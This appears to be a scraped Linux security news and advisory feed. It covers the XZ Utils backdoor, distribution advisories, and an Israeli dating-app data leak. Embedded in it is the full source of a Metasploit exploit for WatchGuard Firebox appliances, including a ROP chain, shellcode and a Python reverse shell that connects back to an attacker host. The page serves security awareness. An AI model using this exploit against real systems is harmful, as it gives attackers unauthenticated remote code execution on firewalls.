Had a Microsoft developer not spotted the malware when he did, the outcome could have been much worse.

Source: ozrimoz via Shutterstock

A newly discovered backdoor in XZ Utils, a data compression utility present in nearly all Linux distributions, has revived the ghosts of previous major software-supply chain security scares such as the Log4Shell vulnerability and the attack on SolarWinds.

The backdoor is embedded in an XZ library called liblzma and gives remote attackers a way to bypass secure shell (sshd) authentication and then gain complete access to an affected system. An individual with maintainer-level access to the code appears to have deliberately introduced the backdoor in a painstakingly executed, multiyear attack.

**A Shock to the OSS Community**

The backdoor affects XZ Utils 5.6.0 and 5.6.1, which are versions of the utility currently used only in unstable and beta releases of Fedora, Debian, Kali, open SUSE, and Arch Linux. As a result, the potential threat with this backdoor for now is considerably more limited than if the malware had found its way into a stable Linux distro.

Even so, the fact that someone managed to sneak a nearly undetectable backdoor into a trusted, widely used open source component — and the potential havoc it could have caused — has come as a painful wakeup call on how vulnerable organizations remain to attacks via the supply chain.

"This supply chain attack came as a shock to the OSS community, as XZ Utils was considered a trusted and scrutinized project," JFrog researchers said in a blog post. "The attacker built up a credible reputation as an OSS developer over the span of multiple years and used highly obfuscated code in order to evade detection by code reviews."

XZ Util is a command-line utility for compressing and decompressing data in Linux and other Unix-like operating systems. Microsoft developer Andres Freund discovered the backdoor in the software when investigating odd behavior in recent weeks around liblzma on some Debian installations. After initially thinking the backdoor was purely a Debian problem, Freund discovered the issue actually impacted the upstream XZ repository and associated tarballs or archive files. He publicly disclosed the threat on March 29.

Over the weekend, security teams associated with Fedora, Debian, openSUSE, Kali, and Arch issued urgent advisories alerting organizations running the affected Linux releases to immediately revert to earlier, more stable releases of their software to mitigate the potential risk of remote-code execution.

**Maximum Severity Vuln**

Red Hat, the primary sponsor and contributor to Fedora, assigned the backdoor a vulnerability identifier (CVE-2024-3094) and assessed it as a maximum severity risk (CVSS score of 10) to draw attention to the threat. The US Cybersecurity and Infrastructure Security Agency (CISA) joined the chorus of voices urging organizations using affected Linux distributions to downgrade their XZ Utils to an earlier version, and to hunt for any potential activity related to the backdoor and report any such findings to the agency.

All of the advisories offered tips for users on how to quickly check for the presence of the back-doored XZ versions in their code. Red Hat released an update that reverts XZ to previous versions, which the company will make available via its normal update process. But users concerned about potential attacks can force the update if they don't want to wait for the update to become available via the normal process, the company said.

Today Binarly released a free tool that organizations can use to look for backdoored XZs as well.

"Had this malicious code been introduced to stable OS releases in multiple Linux distributions, we could have seen in-the-wild exploitation en-masse," says Scott Caveza, staff research engineer at Tenable. "The longer this went unnoticed, the greater the potential for more malicious code from whomever this malicious actor might be."

In an FAQ, Tenable described the backdoor as modifying functions within liblzma in such a way as to allow attackers to intercept and modify data within the library. "In the example observed by Freund, under certain conditions, this backdoor could allow a malicious actor to 'break sshd authentication,' allowing the attacker to gain access to an affected system," noted the researchers.

**XZ Utils "Maintainer" Behind the Backdoor**

What makes the backdoor especially troublesome is the fact that someone using an account belonging to a maintainer of XZ Util embedded the malware in the package in what appears to have been a carefully planned multiyear operation. In a widely referenced blog post, security researcher Evan Boehs traced the malicious activity back to 2021 when an individual using the name Jia Tan created a GitHub account and almost immediately started making suspicious changes to some open source projects.

The blog post provides a detailed timeline of the steps Jia Tan and a couple of other individuals took to gradually build enough trust within the XZ community to make changes to the software and eventually introduce the backdoor.

"All the evidence points to social manipulation being used by a person with the sole end goal of inserting a backdoor," Boehs tells Dark Reading. "Basically, there was never a genuine effort to maintain the project, only to gain enough trust to insert \[the backdoor\] quietly."

Typically, gaining commit access to a repository requires an individual to establish a sense of trustworthiness. Often, projects give new commit access to individuals only when there is a need for it and after some risk assessment, Boehs says.

"In this case, Jia created a \[seemingly\] legitimate need for more maintainers ... and then began building trust. Our society is built on trust, and occasionally some crafty people exploit it," he notes. "Gaining permission requires trust. Trust takes time to establish. Jia was in it for the long game."

Boehs says it's unclear when exactly Jia Tan became a trusted member of the repository. But soon after his first commit in 2022, Jia Tan became a regular contributor and is currently the second-most active on the project. GitHub has since suspended Jia Tan's account.

Saumitra Das, vice president of engineering at Qualys, says what happened with XZ Util can happen elsewhere.

"Many critical libraries in open source are being maintained by volunteers in the community who are not paid for it and can be under pressure due to their personal issues," Das says.

Maintainers who are under pressure often welcome contributors who are willing to spend even a little bit of time on their projects. "Over, time, such folks can gain more control over the code," as was the case with XZ Utils, he says.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

XZ Utils Backdoor Implanted in Carefully Executed, Multiyear Supply Chain Attack

Debian Linux Security Advisory 5651-1 - Two security issues were discovered in MediaWiki, a website engine for collaborative work, which could result in cross-site scripting or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5651-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 31, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : mediawikiCVE ID         : not yet availableTwo security issues were discovered in MediaWiki, a website engine forcollaborative work, which could result in cross-site scripting or denialof service.For the oldstable distribution (bullseye), this problem has been fixedin version 1:1.35.13-1+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1:1.39.7-1~deb12u1.We recommend that you upgrade your mediawiki packages.For the detailed security status of mediawiki please refer toits security tracker page at:https://security-tracker.debian.org/tracker/mediawikiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYJtD4ACgkQEMKTtsN8TjZxJA//c0hvMWL9Z5zN5rxn3K+Zc6SL9EjbOsWuOcpGWInkdNGKFL1ohLsoWKo5tZRA/KuGv9LNMJU/StYbb10s7yuSsHWnJ3/DXXs7LV9voOam4SCyOQoSQ1/VOL2IpdzycN9algbPXxMUYTu9NA1ogSFrjLvdFDpcEmzl2bnhlVLV554a1DeLY7S9PFyH7Z89KbcDq/SJg1qXArvUNyCPnfdEAdfJgzuOoFECGDOwloFEy89zShZK03FiylJ+o0kGzDOk0Knk9cE1vkdLlDVpBg9YaQpA9S4Pv6dCEQm3TYvFPqX6sbeO0l7cX8TLKntrON2ElMrATzV2o269RuB7CLoIX4KIIG61pEkWDM/ZAvzvPox8XbZqgnNVZiBZc02SXuvJ0W0HsBhh5mHHSGznWXvh6DxD/pVWR4+TWzs4Il/vdfCStMu8Oaw1BjnqsJkIgHK3SSGIuxfMYGsiJZ4eK40fJ6+v7b7m2mtaHgpSEgCZyn0dtr70OwkH0slr7BTpwnWQ/1svGB2aPQ82Wip+dJuap/xRI60tnbT8ipM17Vq8ECeL65ef4R+Atf6L4cC7TQCMXI66XU/ZYSUpiOs2qYDI9aqzT90EgyQkRnJbbIh4xDd3mqSFIxXVR4d/J5poHPiVo9Gr8LVldyfDNa2OCdxhJ74DyY+qkgaH43Yb0CmFEak==YhNf-----END PGP SIGNATURE-----

Debian Security Advisory 5651-1

Gentoo Linux Security Advisory 202403-4 - A backdoor has been discovered in XZ utils that could lead to remote compromise of systems. Versions less than 5.6.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: XZ utils: Backdoor in release tarballs  
     Date: March 29, 2024  
     Bugs: #928134  
       ID: 202403-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A backdoor has been discovered in XZ utils that could lead to remote  
compromise of systems.

Background  
==========

XZ Utils is free general-purpose data compression software with a high  
compression ratio.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-arch/xz-utils  >= 5.6.0      < 5.6.0

Description  
===========

A backdoor has been discovered in XZ utils. Please review the CVE  
identifier referenced below for details.

Impact  
======

Our current understanding of the backdoor is that is does not affect  
Gentoo systems, because

1. the backdoor only appears to be included on specific systems and  
Gentoo does not qualify;  
2. the backdoor as it is currently understood targets OpenSSH patched to  
work with systemd-notify support. Gentoo does not support or include  
these patches;

Analysis is still ongoing, however, and additional vectors may still be  
identified. For this reason we are still issuing this advisory as if  
that will be the case.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All XZ utils users should downgrade to the latest version before the  
backdoor was introduced:

  # emerge --sync  
  # emerge --ask --oneshot --verbose "<app-arch/xz-utils-5.6.0"

References  
==========

[ 1 ] CVE-2024-3094  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3094

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-04

A use-after-free vulnerability exists in the Linux kernel netfilter: nf_tables component. This is a universal local privilege escalation proof of concept exploit working on Linux kernels between 5.14 and 6.6, including Debian, Ubuntu, and KernelCTF.

Linux nf_tables Local Privilege Escalation

Debian Linux Security Advisory 5650-1 - Skyler Ferrante discovered that the wall tool from util-linux does not properly handle escape sequences from command line arguments. A local attacker can take advantage of this flaw for information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5650-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
March 31, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : util-linux  
CVE ID         : CVE-2024-28085  
Debian Bug     : 1067849

Skyler Ferrante discovered that the wall tool from util-linux does not  
properly handle escape sequences from command line arguments. A local  
attacker can take advantage of this flaw for information disclosure.

With this update wall and write are not anymore installed with setgid  
tty.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.36.1-8+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.38.1-5+deb12u1.

We recommend that you upgrade your util-linux packages.

For the detailed security status of util-linux please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/util-linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYJTYpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Sm+A//cJhy/p0UGnSP5MYNc1a1sLeAMcNJm4lwxqR3zDYYqPWAe0jwsspaguNY  
1QPdaqa3d/Vm8pDO8WCnqxuzwqDjwyKNLUYmFbOyDx+U4EyVxC6wsUq936XMvx/5  
xiuTJripQm8urnvCaa7lGLhNSWHOc2jHWCqLnXC2AKwAtSGT7LWFKzC8csHxtRYO  
5A5iUaDONPWJtGpNDx1cczfIuEUvGpANQWOgxrcyAmHb1kjpGHm0RTikpkqKNm4W  
VH+DbgzuXlLtzUn0/YUXJPJkZtPe1LDshhUwFhU13K2lIUk3hWBWyGIrXgG+OZhu  
XgPc/5yAZHjmffHawUPE0LWGA3U6xOWV3pvBIi07XF/kFwR00PXGfMdv9WrTUxxV  
V6Fv5/kd2MsWvZQSYJ9Bn/6Wo5O9w8M3Lfso2OYx01OFRQHQfn4rfRek0ED81155  
qqPaemJYeUIJsDEmiwdr+eh0LZm7+3oMOgdfKDc9ARm9fasWxA7SFg4w5P1h0IWO  
lzuwEzm2W0az9YJ/BFMaZfoTTn/DW9FJHL7Fo5F2vO9CLAihxMYUDM3mUZNBexY8  
Z6XzhdWOSkOAiYI4khDK/TK8jQxSpEjNiFh7Z2pIZs4F6COjI94xtIn+N5nyJxnk  
AweXW0GGSZxt1sXD99JeD27Rv0UXNKyHfcQRPaYo9FyHntkVxi4=  
=jL1I  
-----END PGP SIGNATURE-----

Debian Security Advisory 5650-1

Red Hat Security Advisory 2024-1576-03 - An update for the ruby:3.1 module is now available for Red Hat Enterprise Linux 9. Issues addressed include HTTP response splitting and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1576.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.1 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2024:1576-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1576Issue date:         2024-04-01Revision:           03CVE Names:          CVE-2021-33621====================================================================Summary: An update for the ruby:3.1 module is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-29052)Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)Bug Fix(es):* ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-29048)* ruby: Ruby cannot read private key in FIPS mode on RHEL 9 (RHEL-12437)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-33621References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2149706https://bugzilla.redhat.com/show_bug.cgi?id=2184059https://bugzilla.redhat.com/show_bug.cgi?id=2184061https://bugzilla.redhat.com/show_bug.cgi?id=2218614

Red Hat Security Advisory 2024-1576-03

By Waqas
Another day, another alleged data breach putting hundred of thousands of unsuspecting users at risk.
This is a post from HackRead.com Read the original post: Israeli LGBTQ App Atraf Faces Data Leak, 700,000 Users Affected

Atraf, a popular Israeli LGBTQ dating app, has suffered a major data breach exposing personal information of over half a million users – Leaked data includes clear text password and payment card data – Atraf users are advised to change their passwords immediately!

In November 2021, **Hackread.com reported** a ransom failure leading to the data leak of some Israeli LGBTQ dating app Atraf users. The group responsible for the attack, Black Shadow, originated from Iran. They demanded a ransom of $1 million after acquiring the app’s data by compromising an Israeli hosting service named CyberServe.

Now, a user on **Breach Forums**, apparently of Russian origin, claims to have leaked the Atraf database, containing the personal data of over 1.5 million users. However, Hackread.com has analyzed the 2.63 GB worth of data, which appears legitimate. After removing duplicates, the total number of leaked accounts decreases to over half a million, precisely 669,672.

It’s worth noting that the Atraf database was leaked twice in 2023 on the same forum. However, neither of these leaks contained clear text passwords or sensitive personal information like the latest one.

What the Breach Forums user posted on the forum (Credit: Hackread.com)

It’s important to note that the data breach remains alleged until official confirmation from the company. Meanwhile, our analysis reveals a treasure trove of personal and sensitive information, primarily from Israeli users. This information includes:

*   Full names
*   Nicknames
*   County
*   City
*   Age
*   Height
*   Religion
*   Address
*   Phone numbers
*   IP addresses
*   Data of birth
*   Interests and hobbies
*   Sex and Gender
*   Sexual orientation
*   Email addresses
*   Plain text passwords for some
*   Location coordinates
*   Type of smartphone and operating system
*   Conversations in direct messages (DMs)
*   Family details including if they have children or not
*   Payment card data excluding card numbers but including CVV codes, expiry dates, and card types (Master/Visa).
*   _And much more…_

Hackread.com can confirm that the leaked records date back to 2021, with no recent records. The timeline aligns with the claims made by Black Shadow in November 2021, suggesting that the data might be legitimate.

Screenshot from the leaked data (Credit: Hackread.com)

Nevertheless, this data breach poses a significant threat to the privacy and physical security of affected users. It can result in online harassment and the hacking of email accounts, as the breach includes clear text passwords.

If you are an Atraf user, you must immediately change the passwords for both your email and Atraf account. Additionally, exercise caution with emails purportedly from Atraf and double-check before clicking any links, as they could be attempts by cybercriminals to compromise your data further or infect your device with malware.

Hackread.com has notified Atraf about the breach, seeking their official response. If you have any concerns about your data, you can also contact Hackread.com at \[email protected\].

1.  Anonymous Sudan’s DDoS Attacks at Israeli BAZAN Group
2.  Hackers Target Israeli Rocket Alert App Users with Spyware
3.  Israeli El Al Sys Hackers Hit Flights in Mid-Air Hijack Attempt
4.  Hackers Defaces Israeli-Made Equipment at US Water Agency
5.  Iran’s MuddyWater Group Hit Israelis with Fake Memo Phishing
6.  Hamas Hackers Hit Israelis with New BiBi-Linux Wiper Malware

Israeli LGBTQ App Atraf Faces Data Leak, 700,000 Users Affected

RedHat on Friday released an "urgent security alert" warning that two versions of a popular data compression library called XZ Utils (previously LZMA Utils) have been backdoored with malicious code designed to allow unauthorized remote access.
The software supply chain compromise, tracked as CVE-2024-3094, has a CVSS score of 10.0, indicating maximum severity. It impacts XZ Utils

Urgent: Secret Backdoor Found in XZ Utils Library, Impacts Major Linux Distros

This Metasploit module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zlib'class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary          called wgagent using pre-authentication endpoint /agent/login.          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Charles Fol (Ambionics Security)', # discovery          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'          'Misterxid' # POC        ],        'References' => [          [ 'CVE', '2022-26318' ],          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Automatic (Reverse Python Interactive Shell)',            {              'Platform' => [ 'unix' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_python',                'SHELL' => '/usr/bin/python'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-08-29',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 8080        },        'Notes' => {          'Stability' => [ SERVICE_RESOURCE_LOSS ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])      ]    )  end  def check_watchguard_firebox?    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),      'vars_get' => {        'from_page' => '/'      }    })    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')    false  end  def create_bof_payload    # temporary filename in /tmp where python payload will be stored.    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"    # xml overflow payload    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode    payload << ('A' * 3181).encode    payload << 'MFA>'.encode    payload << ('<BBBBMFA>' * 3680).encode    # padding and rop chain    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"    payload << "\x01\x00\x00\x00\x00\x00\x00"    # shell code to launch an reverse interactive python shell    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed    # The interactive Python shell (-i) is for now the only way to get shell access    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode    payload << "import os; os.remove(\"#{@py_fname}\");".encode    return Zlib.gzip(payload)  end  def check    print_status("Checking if #{peer} can be exploited.")    return CheckCode::Detected if check_watchguard_firebox?    CheckCode::Safe  end  def exploit    print_status("#{peer} - Attempting to exploit...")    bof_payload = create_bof_payload    print_status("#{peer} - Sending payload...")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),      'headers' => {        'Accept-Encoding' => 'gzip, deflate',        'Content-Encoding' => 'gzip'      },      'data' => bof_payload    })  endend

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Debian Linux Security Advisory 5649-1 - Andres Freund discovered that the upstream source tarballs for xz-utils, the XZ-format compression utilities, are compromised and inject malicious code, at build time, into the resulting liblzma5 library.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5649-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMarch 29, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : xz-utilsCVE ID         : CVE-2024-3094Andres Freund discovered that the upstream source tarballs for xz-utils,the XZ-format compression utilities, are compromised and injectmalicious code, at build time, into the resulting liblzma5 library.Right now no Debian stable versions are known to be affected.Compromised packages were part of the Debian testing, unstable andexperimental distributions, with versions ranging from 5.5.1alpha-0.1(uploaded on 2024-02-01), up to and including 5.6.1-1. The package hasbeen reverted to use the upstream 5.4.5 code, which we have versioned5.6.1+really5.4.5-1.Users running Debian testing and unstable are urged to update thexz-utils packages.For the detailed security status of xz-utils please refer toits security tracker page at:https://security-tracker.debian.org/tracker/xz-utilsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYG4XBfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QBZg/9HMXAGIvBC12v8PSnp6EjnagxXBjTqLIJzEwQFgmC1cS58Kmv214c3fD+rxHEfqQxcgjVSWPbIgI5ZXf1XZtx1YiMGRd9aEvKQSwLu0ox0/UR5igZakLrZb+nt1qvH8AGYQhK41ysFJVwNulUXqqopvGEPgwopLfGPn8P3zjOrs0BoLqYmQ0nbsv392l9rAYk6W7G+L3Gwp/cQVzqmyErlEk/QB3Ld+6HLP7a8shY+A8a7iVHE1vkzNjwJeZ2shIrvkCJqb1/BVSJU92fy2P4xjiMY8phDum7dzWnyy0WZLa90B/tDF9WB7OknuUa020yxjflnabSM112We1V8D5sh18X30NK8scXiCD5cbPEysGqaUf8Baik9quxWkn60oqLKFN0VdrUxeqyLp1AC7wEiysQaNqv/8ZqhYF3/KxrbzgBOVy9XeB3pEfkoLLPtUeH3kuXGw2Qp+Kqg3Zlfe04XZZX5kme/7PFkBvjZ8JFH7dWW+eEO9MbnsPDbr0tWxod0jhvLdZ6YLFad6q2jkjqO3LH3+SYAhp+otcY1TNpIe7xWAB+Phj0TJquIoSnYutqEb4mwoUzn9vZRzOxLvyePEJwbFG89sQf4GCYm4FwDhyB51Eo5piC7FreEtfsmdU7xAl6tljtUkzTHz27dBIokrgw4W0YrYaeUSmm3jKttPA==522l-----END PGP SIGNATURE-----

Tag

#linux